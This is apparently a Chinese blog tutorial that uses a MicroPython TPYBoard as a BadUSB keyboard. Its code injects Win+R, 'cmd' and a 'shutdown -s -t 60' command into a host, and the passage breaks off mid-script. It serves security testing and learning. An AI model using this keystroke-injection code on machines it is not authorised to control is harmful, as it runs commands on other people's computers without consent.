转载请注明：@小五义http://www.cnblogs.com/xiaowuyi  QQ群：64770604 

     本文以TPYBoardv101开发板为例讲解了利用micropython进行BadUSB的usb-HID设备测试的主要方法，使用mt7681模块进行了一个简单的实验，实现了手机摇控键盘输入的测试。

0x01引言

Micropython即运行在微控制器上的Python，只要你懂python3.x,就可以让你像使用arduino那样进行硬件开发。随着micropython的发布，已经有越来越多的人研究和利用其进行项目开发。本人也进行了一些研究，发现利用python进行操作确实很方便，很简单。目前支持micropython的开发板有很多，如pyboard、pyMagic、TPYBoard等。

  Pyboard

  Pymagic

TPYBoard

 

  最近从网上搞了一块tpyboard V101（官网www.micropython.net.cn）进行了一下研究，特别是对其自身的USB-HID功能进行了测试，令人惊喜的是，你可以在仅懂python的情况下，进行HID攻击的姿态测试。具体TPYBoardv101的使用方法，请参见www.micropython.net.cn。 

  0x02 TPYBoardV101模拟键盘 

     该板子的使用方法入门，本文中略过，有兴趣的可以查看其网站http://www.micropython.net.cn/support_category.php?id=2。TPYBoardv101中，在进行键盘模拟时，每次发送了8个字符，只要搞清楚了这8个字符的含义，就能够进行HID模拟了。 

键盘发送的8个字符：BYTE1 BYTE2 BYTE3 BYTE4 BYTE5 BYTE6 BYTE7 BYTE8。其中BYTE1用来实现功能键：

 

BYTE1 --
|--bit0: Left Control 按下时为1
|--bit1: Left Shift按下时为1
|--bit2: Left Alt按下时为1
|--bit3: Left GUI按下时为1
|--bit4: Right Control按下时为1
|--bit5: Right Shift按下时为1
|--bit6: Right Alt按下时为1
|--bit7: Right GUI按下时为1

 

BYTE3到BYTE8是具体按键（见0x06附件），如：

按下left shift + a ，则发送 0x02,0x00,0x04,0x00,0x00,0x00,0x00,0x00。

这里以按下left GUI+R来具体讲解实现过程。

第一步：修改boot.py文件，代码如下：

 

import machine
import pyb
#pyb.main('main.py') # main script to run after this one
#pyb.usb_mode('CDC+MSC') # act as a serial and a storage device
pyb.usb_mode('CDC+HID',hid=pyb.hid_keyboard) 

第二步，修改main.py文件，代码如下：

 

# main.py -- put your code here!
hid=pyb.USB_HID()
def release_key_once():
    buf = bytearray(8) # report is 8 bytes long
    buf[2] = 0
    hid.send(buf) # key released
    pyb.delay(10)
def press_key_once(key):
    buf = bytearray(8) # report is 8 bytes long
    buf[2] = key
    hid.send(buf) # key released
    pyb.delay(10)
def press_2key(key1,key2):
    buf = bytearray(8) # report is 8 bytes long
    buf[0] = key1
    buf[2] = key2
    hid.send(buf) # key released
    pyb.delay(10)
def release_2key():
    buf = bytearray(8) # report is 8 bytes long
    buf[0] = 0
    buf[2] = 0
    hid.send(buf) # key released
    pyb.delay(10)

pyb.delay(1000) #开始加入1秒延时
press_2key(0x08,0x15)#具体键值见附录部分
release_2key() 

第三步，安全退出TPYBoardv101，然后按一下RST键，可以看到一秒后“运行”窗口弹出。

  0x03 简单的HID测试

   测试打开“运行”窗口，输入cmd，然后弹出cmd后，输入shutdown -s -t 60 ,即60秒后自动关机。

Main.py的代码如下：

 

# main.py -- put your code here!
hid=pyb.USB_HID()
def release_key_once():
    buf = bytearray(8) # report is 8 bytes long
    buf[2] = 0
    hid.send(buf) # key released
    pyb.delay(10)
def press_key_once(key):
    buf = bytearray(8) # report is 8 bytes long
    buf[2] = key
    hid.send(buf) # key released
    pyb.delay(10)
def press_2key(key1,key2):
    buf = bytearray(8) # report is 8 bytes long
    buf[0] = key1
    buf[2] = key2
    hid.send(buf) # key released
    pyb.delay(10)
def release_2key():
    buf = bytearray(8) # report is 8 bytes long
    buf[0] = 0
    buf[2] = 0
    hid.send(buf) # key released
    pyb.delay(10)
    

pyb.delay(1000) #开始加入1秒延时
press_2key(0x08,0x15)#具体键值见附录部分
release_2key()
pyb.delay(100)
a=[0x06,0x10,0x07,0x28] #cmd+enter
for i in a:
    press_key_once(i)
    release_key_once()
pyb.delay(1000)
#shutdown -s -t 60 + enter
a=[0x16,0x0b,0x18,0x17,0x07,0x12